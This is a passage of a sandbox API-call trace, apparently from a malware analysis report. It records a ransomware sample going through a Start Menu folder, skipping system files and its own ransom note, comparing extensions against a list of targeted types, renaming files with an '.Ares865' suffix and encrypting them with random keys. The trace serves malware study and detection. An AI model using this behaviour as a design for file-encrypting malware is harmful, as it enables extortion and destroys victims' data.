lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0092.399] lstrlenW (lpString="tps") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0092.399] lstrlenW (lpString="trc") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.399] lstrlenW (lpString="trc") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.399] lstrlenW (lpString="trm") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0092.399] lstrlenW (lpString="udb") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0092.399] lstrlenW (lpString="udl") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0092.399] lstrlenW (lpString="usr") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0092.400] lstrlenW (lpString="v12") returned 3 [0092.400] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0092.400] lstrlenW (lpString="vis") returned 3 [0092.400] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0092.400] lstrlenW (lpString="vpd") returned 3 [0092.400] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0092.400] lstrlenW (lpString="vvv") returned 3 [0092.400] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0092.400] lstrlenW (lpString="wdb") returned 3 [0092.400] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0092.400] lstrlenW (lpString="wmdb") returned 4 [0092.400] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0092.400] lstrlenW (lpString="wrk") returned 3 [0092.400] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0092.400] lstrlenW (lpString="xdb") returned 3 [0092.400] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0092.400] lstrlenW (lpString="xld") returned 3 [0092.400] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0092.400] lstrlenW (lpString="xmlff") returned 5 [0092.400] lstrcmpiW (lpString1="t.lnk", lpString2="xmlff") returned -1 [0092.400] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.Ares865") returned 88 [0092.400] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\command prompt.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\command prompt.lnk.ares865"), dwFlags=0x1) returned 1 [0092.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\command prompt.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.402] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1280) returned 1 [0092.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.402] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.402] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.403] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.403] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.403] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x15c [0092.404] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0092.405] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.406] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.406] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.406] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.406] CloseHandle (hObject=0x15c) returned 1 [0092.406] CloseHandle (hObject=0x118) returned 1 [0092.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.407] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0092.407] lstrlenW (lpString="Desktop.ini") returned 11 [0092.407] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk") returned 80 [0092.407] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0092.407] lstrlenW (lpString="Desktop.ini") returned 11 [0092.407] lstrlenW (lpString="Ares865") returned 7 [0092.407] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0092.407] lstrlenW (lpString=".dll") returned 4 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0092.407] lstrlenW (lpString=".lnk") returned 4 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0092.407] lstrlenW (lpString=".ini") returned 4 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0092.407] lstrlenW (lpString=".sys") returned 4 [0092.407] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0092.407] lstrlenW (lpString="Desktop.ini") returned 11 [0092.408] lstrlenW (lpString="bak") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0092.408] lstrlenW (lpString="ba_") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0092.408] lstrlenW (lpString="dbb") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0092.408] lstrlenW (lpString="vmdk") returned 4 [0092.408] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0092.408] lstrlenW (lpString="rar") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0092.408] lstrlenW (lpString="zip") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0092.408] lstrlenW (lpString="tgz") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0092.408] lstrlenW (lpString="vbox") returned 4 [0092.408] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0092.408] lstrlenW (lpString="vdi") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0092.408] lstrlenW (lpString="vhd") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0092.408] lstrlenW (lpString="vhdx") returned 4 [0092.408] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0092.408] lstrlenW (lpString="avhd") returned 4 [0092.408] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0092.408] lstrlenW (lpString="db") returned 2 [0092.408] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0092.408] lstrlenW (lpString="db2") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0092.408] lstrlenW (lpString="db3") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0092.408] lstrlenW (lpString="dbf") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0092.408] lstrlenW (lpString="mdf") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0092.408] lstrlenW (lpString="mdb") returned 3 [0092.408] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0092.409] lstrlenW (lpString="sql") returned 3 [0092.409] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0092.409] lstrlenW (lpString="sqlite") returned 6 [0092.409] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0092.409] lstrlenW (lpString="sqlite3") returned 7 [0092.409] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0092.409] lstrlenW (lpString="sqlitedb") returned 8 [0092.409] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0092.409] lstrlenW (lpString="xml") returned 3 [0092.409] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0092.409] lstrlenW (lpString="$er") returned 3 [0092.409] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0092.409] lstrlenW (lpString="4dd") returned 3 [0092.409] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0092.409] lstrlenW (lpString="4dl") returned 3 [0092.409] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0092.409] lstrlenW (lpString="^^^") returned 3 [0092.409] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0092.409] lstrlenW (lpString="abs") returned 3 [0092.409] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0092.409] lstrlenW (lpString="abx") returned 3 [0092.409] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0092.409] lstrlenW (lpString="accdb") returned 5 [0092.409] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0092.409] lstrlenW (lpString="accdc") returned 5 [0092.409] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0092.409] lstrlenW (lpString="accde") returned 5 [0092.409] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0092.409] lstrlenW (lpString="accdr") returned 5 [0092.409] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0092.409] lstrlenW (lpString="accdt") returned 5 [0092.409] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0092.409] lstrlenW (lpString="accdw") returned 5 [0092.409] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0092.409] lstrlenW (lpString="accft") returned 5 [0092.409] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0092.409] lstrlenW (lpString="adb") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.410] lstrlenW (lpString="adb") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.410] lstrlenW (lpString="ade") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0092.410] lstrlenW (lpString="adf") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0092.410] lstrlenW (lpString="adn") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0092.410] lstrlenW (lpString="adp") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0092.410] lstrlenW (lpString="alf") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0092.410] lstrlenW (lpString="ask") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0092.410] lstrlenW (lpString="btr") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0092.410] lstrlenW (lpString="cat") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0092.410] lstrlenW (lpString="cdb") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0092.410] lstrlenW (lpString="ckp") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0092.410] lstrlenW (lpString="cma") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0092.410] lstrlenW (lpString="cpd") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0092.410] lstrlenW (lpString="dacpac") returned 6 [0092.410] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0092.410] lstrlenW (lpString="dad") returned 3 [0092.410] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0092.410] lstrlenW (lpString="dadiagrams") returned 10 [0092.410] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0092.410] lstrlenW (lpString="daschema") returned 8 [0092.410] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0092.410] lstrlenW (lpString="db-journal") returned 10 [0092.410] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0092.411] lstrlenW (lpString="db-shm") returned 6 [0092.411] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0092.411] lstrlenW (lpString="db-wal") returned 6 [0092.411] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0092.411] lstrlenW (lpString="dbc") returned 3 [0092.411] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0092.411] lstrlenW (lpString="dbs") returned 3 [0092.411] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0092.411] lstrlenW (lpString="dbt") returned 3 [0092.411] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0092.411] lstrlenW (lpString="dbv") returned 3 [0092.411] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0092.411] lstrlenW (lpString="dbx") returned 3 [0092.411] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0092.411] lstrlenW (lpString="dcb") returned 3 [0092.411] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0092.411] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Desktop.ini.Ares865") returned 81 [0092.411] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0092.413] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.413] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=678) returned 1 [0092.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.413] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.414] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.414] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.414] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5b0, lpName=0x0) returned 0x15c [0092.414] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b0) returned 0x190000 [0092.415] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.415] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.415] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.415] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.415] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.415] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.416] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.416] CloseHandle (hObject=0x15c) returned 1 [0092.416] CloseHandle (hObject=0x118) returned 1 [0092.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.417] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0ebd60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.417] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.417] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d73a72a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Notepad.lnk", cAlternateFileName="")) returned 1 [0092.417] lstrcmpiW (lpString1="Notepad.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.417] lstrcmpiW (lpString1="Notepad.lnk", lpString2="aoldtz.exe") returned 1 [0092.417] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".") returned 1 [0092.417] lstrcmpiW (lpString1="Notepad.lnk", lpString2="..") returned 1 [0092.417] lstrcmpiW (lpString1="Notepad.lnk", lpString2="windows") returned -1 [0092.417] lstrcmpiW (lpString1="Notepad.lnk", lpString2="bootmgr") returned 1 [0092.417] lstrcmpiW (lpString1="Notepad.lnk", lpString2="temp") returned -1 [0092.417] lstrcmpiW (lpString1="Notepad.lnk", lpString2="pagefile.sys") returned -1 [0092.417] lstrcmpiW (lpString1="Notepad.lnk", lpString2="boot") returned 1 [0092.417] lstrcmpiW (lpString1="Notepad.lnk", lpString2="ids.txt") returned 1 [0092.418] lstrcmpiW (lpString1="Notepad.lnk", lpString2="ntuser.dat") returned -1 [0092.418] lstrcmpiW (lpString1="Notepad.lnk", lpString2="perflogs") returned -1 [0092.418] lstrcmpiW (lpString1="Notepad.lnk", lpString2="MSBuild") returned 1 [0092.418] lstrlenW (lpString="Notepad.lnk") returned 11 [0092.418] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Desktop.ini") returned 73 [0092.418] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Notepad.lnk" | out: lpString1="Notepad.lnk") returned="Notepad.lnk" [0092.418] lstrlenW (lpString="Notepad.lnk") returned 11 [0092.418] lstrlenW (lpString="Ares865") returned 7 [0092.418] lstrcmpiW (lpString1="pad.lnk", lpString2="Ares865") returned 1 [0092.418] lstrlenW (lpString=".dll") returned 4 [0092.418] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".dll") returned 1 [0092.418] lstrlenW (lpString=".lnk") returned 4 [0092.418] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".lnk") returned 1 [0092.418] lstrlenW (lpString=".ini") returned 4 [0092.418] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".ini") returned 1 [0092.418] lstrlenW (lpString=".sys") returned 4 [0092.418] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".sys") returned 1 [0092.418] lstrlenW (lpString="Notepad.lnk") returned 11 [0092.418] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Notepad.lnk.Ares865") returned 81 [0092.418] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\notepad.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Notepad.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\notepad.lnk.ares865"), dwFlags=0x1) returned 1 [0092.420] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Notepad.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\notepad.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.421] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1304) returned 1 [0092.421] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.421] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.421] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.421] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.422] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.422] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.422] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x15c [0092.425] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x190000 [0092.546] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.547] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.547] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 